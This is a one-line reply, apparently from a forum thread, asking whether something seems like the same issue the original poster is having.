Does this seem like the same issue the op is having?